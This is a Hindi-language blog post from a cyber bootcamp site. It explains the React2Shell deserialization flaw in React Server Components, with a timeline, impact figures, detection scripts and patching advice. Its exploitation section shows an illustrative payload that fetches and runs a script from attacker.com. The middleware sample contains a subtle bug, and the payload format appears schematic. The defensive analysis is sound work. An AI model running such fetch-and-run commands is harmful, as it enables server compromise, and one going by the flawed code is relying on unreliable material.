8200 साइबर बूटकैंप
अभी नामांकन करें

Select Language

© 2025 8200 साइबर बूटकैंप

React2Shell Vulnerability

React2Shell Vulnerability

CVE-2025-55182 React 19 और Next.js में React Server Components में असुरक्षित डिसिरियलाइज़ेशन से उत्पन्न गंभीर RCE है। डिफ़ॉल्ट HTTP अनुरोधों द्वारा शोषण संभव। क्लाउड क्रेडेंशियल चोरी और क्रिप्टोजैकिंग रोकने के लिए तुरंत पैच करें।
# React2Shell (CVE-2025-55182): एक गम्भीर React कमज़ोरी पर विस्तृत विश्लेषण

*लेखक: लैक्लन डेविडसन*  
*अन्तिम अद्यतन: 4 दिसम्बर 2025*

---

## विषय-सूची

1. [परिचय](#introduction)
2. [पृष्ठभूमि व टाइमलाइन](#background-and-timeline)
3. [React2Shell को समझना](#understanding-react2shell)  
   - [React2Shell क्या है?](#what-is-react2shell)  
   - [तकनीकी अवलोकन](#technical-overview-of-the-vulnerability)
4. [React और Next.js इकोसिस्टम पर प्रभाव](#the-impact-on-react-and-nextjs-ecosystems)
5. [असुरक्षित डी-सीरीयलाइज़ेशन व फ़्लाइट प्रोटोकॉल](#insecure-deserialization-and-the-flight-protocol)
6. [वास्तविक दुनिया में शोषण व केस-स्टडी](#real-world-exploitation-and-case-studies)
7. [डिटेक्शन व रोकथाम तकनीकें](#detection-and-mitigation-techniques)  
   - [Bash व cURL से स्कैनिंग](#scanning-with-bash-and-curl)  
   - [Python से डाटा पार्स करना](#parsing-vulnerability-data-with-python)  
   - [प्रभावी मॉनिटरिंग के सुझाव](#tips-for-effective-monitoring)
8. [उन्नत शोषण तकनीक व पोस्ट-एक्सप्लॉइट विश्लेषण](#advanced-exploitation-techniques)
9. [फ़ॉल्स पॉज़िटिव: किन बातों पर भरोसा न करें](#addressing-false-positives)
10. [पैचिंग व हार्डनिंग हेतु सर्वोत्तम अभ्यास](#best-practices-for-patching-and-hardening)
11. [निष्कर्ष](#conclusion)
12. [संदर्भ](#references)

---

## <a name="introduction"></a>परिचय

पिछले कुछ वर्षों में React तथा इससे जुड़े फ़्रेमवर्कों का उपयोग तेज़ी से बढ़ा है। लोकप्रियता के साथ कमजोरियों का जोखिम भी बढ़ता है, विशेषकर वे जो इकोसिस्टम के महत्वपूर्ण हिस्सों को प्रभावित करती हैं।

29 नवम्बर 2025 को मैंने (लैक्लन डेविडसन) Meta टीम को React2Shell (CVE-2025-55182) नामक एक गम्भीर कमज़ोरी का ज़िम्मेदाराना खुलासा किया। यह खामी React Server Components (RSC) के “Flight” प्रोटोकॉल में असुरक्षित डी-सीरीयलाइज़ेशन के कारण अप्रमाणित रिमोट कोड एक्ज़ीक्यूशन (RCE) की अनुमति देती है। React तथा Vercel टीमों ने 3 दिसम्बर 2025 को इसका पैच जारी किया।

इस ब्लॉग में आप पाएँगे:
- कमज़ोरी का स्पष्टीकरण व इसके गम्भीर प्रभाव।
- तकनीकी विवरण कि यह खामी क्यों व कैसे अस्तित्व में आई।
- वास्तविक दुनिया के शोषण व पोस्ट-एक्सप्लॉइट व्यवहार के अध्ययन।
- कमज़ोर इंस्टैंस ढूँढ़ने के लिये कोड नमूने व स्कैनिंग कमांड।
- पैचिंग व हार्डनिंग के सर्वोत्तम अभ्यास।

चाहे आप सुरक्षा विशेषज्ञ हों, डेवलपर हों या नयी वेब तकनीकों के उत्साही—यह गाइड शुरुआती से उन्नत स्तर तक आपका मार्गदर्शन करेगी।

---

## <a name="background-and-timeline"></a>पृष्ठभूमि व टाइमलाइन

- **29 नवम्बर 2025 (PT):** कमज़ोरी का उत्तरदायी खुलासा Meta को।  
- **3 दिसम्बर 2025 (PT):** React व Vercel ने प्रारम्भिक खुलासे व पैच जारी किये।  
- **4 दिसम्बर 2025:** कई सार्वजनिक PoC कोड सामने आये; कुछ “PoC” वास्तविक खामी को सही तरह न दर्शाते थे।  
- **पैच के बाद निगरानी:** Wiz Research, Amazon Threat Intelligence, Datadog आदि ने वास्तविक शोषण अभियानों का अवलोकन किया।

Next.js में React को “vendored” रूप में शामिल किये जाने के कारण CVE-2025-66478 अलग से जारी किया गया, ताकि परंपरागत स्कैनर जिस निर्भरता को न देखें, उसे भी ट्रैक किया जा सके।

---

## <a name="understanding-react2shell"></a>React2Shell को समझना

### <a name="what-is-react2shell"></a>React2Shell क्या है?

React Server Components के Flight प्रोटोकॉल में मौजूद यह कमज़ोरी निम्न विशेषताओं वाली है:

- **गम्भीरता 10.0 (Critical).**  
- **अप्रमाणित RCE:** साधारण HTTP अनुरोध ही पर्याप्त।  
- **डिफ़ॉल्ट कॉन्फ़िगरेशन असुरक्षित:** create-next-app जैसे सामान्य डिप्लॉयमेंट भी प्रभावित।

### <a name="technical-overview-of-the-vulnerability"></a>तकनीकी अवलोकन

समस्या का मूल D-सीरीयलाइज़ेशन है, जहाँ इनकमिंग पेलोड की संरचना का पर्याप्त सत्यापन नहीं होता। हमलावर अनुकूलित डाटा भेजकर सर्वर-साइड कोड चला सकता है।

सरल प्रवाह:
1. **पेलोड निर्माण.**  
2. **HTTP अनुरोध भेजना.**  
3. **डी-सीरीयलाइज़ेशन व निष्पादन.**  
4. **रिमोट कोड एक्ज़ीक्यूशन.**

---

## <a name="the-impact-on-react-and-nextjs-ecosystems"></a>React व Next.js इकोसिस्टम पर प्रभाव

### यह कमज़ोरी अत्यन्त खतरनाक क्यों?

1. **व्यापक उपयोग**  
2. **शोषण में आसानी**  
3. **उच्च सफलता दर**  
4. **सार्वजनिक एक्सपोज़र** – Wiz के अनुसार 39 % क्लाउड पर्यावरण प्रभावित पाये गये।

### Next.js अपवाद

React के vendored होने से पारम्परिक स्कैनर इसे नजरअंदाज़ कर सकते हैं, इसलिये CVE-2025-66478 जारी किया गया।

---

## <a name="insecure-deserialization-and-the-flight-protocol"></a>असुरक्षित डी-सीरीयलाइज़ेशन व फ़्लाइट प्रोटोकॉल

डी-सीरीयलाइज़ेशन तब असुरक्षित होती है जब:
- पर्याप्त वैदिकरण न हो।  
- इसका दुरुपयोग कर कोड चलाया जा सके।  

Flight प्रोटोकॉल तेज़ डेटा आदान-प्रदान हेतु बना, पर अपर्याप्त वैलिडेशन ने हमले का रास्ता खोल दिया।

---

## <a name="real-world-exploitation-and-case-studies"></a>वास्तविक दुनिया में शोषण व केस-स्टडी

- **क्रेडेन्शियल हर्वेस्टिंग**  
- **क्रिप्टो-माइनिंग (XMRig)**  
- **पोस्ट-एक्सप्लॉइट रीकॉन**  

### केस-स्टडी: Kubernetes पर Next.js

हमलावर ने कस्टम Flight पेलोड भेजकर:
- रिवर्स शेल स्थापित की।  
- Kubernetes secrets पढ़े।  
- होस्ट तक विशेषाधिकार प्राप्त किये।  

### क्लाउड वातावरण पर आक्रमण

Wiz के आँकड़े:
- 39 % पर्यावरण में कमज़ोर इंस्टैंस।  
- AWS क्रेडेन्शियल बेस64 में एन्कोड कर बाहर भेजने के प्रयास देखे गये।  

---

## <a name="detection-and-mitigation-techniques"></a>डिटेक्शन व रोकथाम तकनीकें

### <a name="scanning-with-bash-and-curl"></a>Bash व cURL से त्वरित स्कैन

```bash
#!/bin/bash
TARGET="<target_url>"
PAYLOAD='{"malicious":"payload"}'

echo "Scanning $TARGET..."
RESPONSE=$(curl -s -X POST -H "Content-Type: application/json" -d "$PAYLOAD" "$TARGET")

if echo "$RESPONSE" | grep -q "Error processing Flight payload"; then
  echo "संभावित कमज़ोरी पाई गई!"
else
  echo "स्पष्ट संकेत नहीं मिले। आगे जाँच आवश्यक।"
fi

Python स्क्रिप्ट

import requests, json

def scan_target(url):
    payload = {"test":"data","action":"simulate_deserialization"}
    try:
        r = requests.post(url, headers={"Content-Type":"application/json"},
                          data=json.dumps(payload), timeout=5)
        if "Error processing Flight payload" in r.text:
            print(f"[!] {url} प्रभावित हो सकता है")
        else:
            print(f"[-] {url} पर तत्काल संकेत नहीं")
    except requests.RequestException as e:
        print(f"स्कैन त्रुटि: {e}")

for u in ["https://example.com/api/flight"]:
    scan_target(u)

प्रभावी मॉनिटरिंग के सुझाव

  1. रन-टाइम संरक्षण उपयोग करें।
  2. लॉग में असामान्य Flight अनुरोध ढूँढ़ें।
  3. भेद्यता प्रबंधन टूल से स्वतः टैगिंग।

उन्नत शोषण तकनीक व पोस्ट-एक्सप्लॉइट विश्लेषण

पेलोड निर्माण, WAF बाईपास, चेनिंग इत्यादि
const maliciousPayload = {
  component: "ShellExec",
  args: {
    command: "bash -c 'curl -fsSL http://attacker.com/malware.sh | sh'",
  },
  _meta: { timestamp: Date.now(), nonce: Math.random().toString(36).slice(2) }
};
sendToServer(JSON.stringify(maliciousPayload));

Disclaimer: केवल शैक्षिक उद्देश्य; अनधिकृत शोषण दण्डनीय है।

पोस्ट-एक्सप्लॉइट कदम
  • रिवर्स शेल, सीक्रेट हर्वेस्टिंग, लैटरल मूवमेंट, क्रिप्टो-माइनर तैनाती।

फ़ॉल्स पॉज़िटिव: किन बातों पर भरोसा न करें

vm#runInThisContext, child_process#exec, fs#writeFile जैसी फ़ंक्शनों की उपस्थिति अपने-आप खतरा सिद्ध नहीं करती। वास्तविक React2Shell शोषण इन पर निर्भर नहीं।

सुरक्षा टीमें:

  • स्कैनर आउटपुट को आधिकारिक सलाह से मिलान करें।
  • रन-टाइम व्यवहार पर नज़र रखें।

पैचिंग व हार्डनिंग हेतु सर्वोत्तम अभ्यास

  1. विक्रेता सलाह पढ़ें।
  2. तुरन्त पैच करें: react-server-dom* 19.0.1+, 19.1.2+, 19.2.1+ इत्यादि।
  3. रन-टाइम सुरक्षा लागू करें।
  4. लॉग व SIEM निगरानी।
  5. थ्रेट इंटेल शेयरिंग।
डेवलपर हेतु हार्डनिंग
  • इनपुट वैदिकरण।
  • Flight एन्ड-पॉइंट को अतिरिक्त सुरक्षा परत के पीछे रखें।
  • नियमित ऑडिट व डिपेन्डेन्सी स्कैन।
  • वातावरण पृथक्करण।
// Next.js मिडलवेयर उदाहरण
import { NextResponse } from 'next/server';

export function middleware(request) {
  if (request.nextUrl.pathname.startsWith('/api/flight')) {
    try {
      const body = request.json();
      if (!body || typeof body !== 'object' || !body.component)
        return new NextResponse('नामान्य पेलोड', { status: 400 });
    } catch {
      return new NextResponse('रिक्वेस्ट प्रोसेस त्रुटि', { status: 400 });
    }
  }
  return NextResponse.next();
}

निष्कर्ष

React2Shell (CVE-2025-55182) दर्शाता है कि लोकप्रिय फ़्रेमवर्क भी उच्च-गम्भीरता कमज़ोरियों से मुक्त नहीं। असुरक्षित डी-सीरीयलाइज़ेशन के कारण यह खामी अप्रमाणित RCE सक्षम करती है।

मुख्य बिन्दु:

  • सार्वजनिक क्लाउड में ख़तरा अत्यधिक।
  • Next.js हेतु अलग CVE-2025-66478 जारी।
  • वास्तविक शोषण पहले से जारी; शीघ्र पैच अनिवार्य।
  • फ़ॉल्स पॉज़िटिव से सावधान रहें; रन-टाइम निगरानी महत्त्वपूर्ण।
  • नयी खुफ़िया जानकारी के साथ सुरक्षा मुद्रा निरन्तर सुधारें।

संदर्भ

सुरक्षित कोडिंग के लिये शुभकामनाएँ!

🚀 अगले स्तर पर जाने के लिए तैयार हैं?

अपने साइबर सुरक्षा करियर को अगले स्तर पर ले जाएं

यदि आपको यह सामग्री मूल्यवान लगी, तो कल्पना कीजिए कि आप हमारे व्यापक 47-सप्ताह के विशिष्ट प्रशिक्षण कार्यक्रम के साथ क्या हासिल कर सकते हैं। 1,200+ से अधिक छात्रों से जुड़ें जिन्होंने यूनिट 8200 तकनीकों के साथ अपने करियर को बदल दिया है।

पूर्ण कार्यक्रम में नामांकन करेंपाठ्यक्रम देखें
97% जॉब प्लेसमेंट दर
एलीट यूनिट 8200 तकनीकें
42 हैंड्स-ऑन लैब्स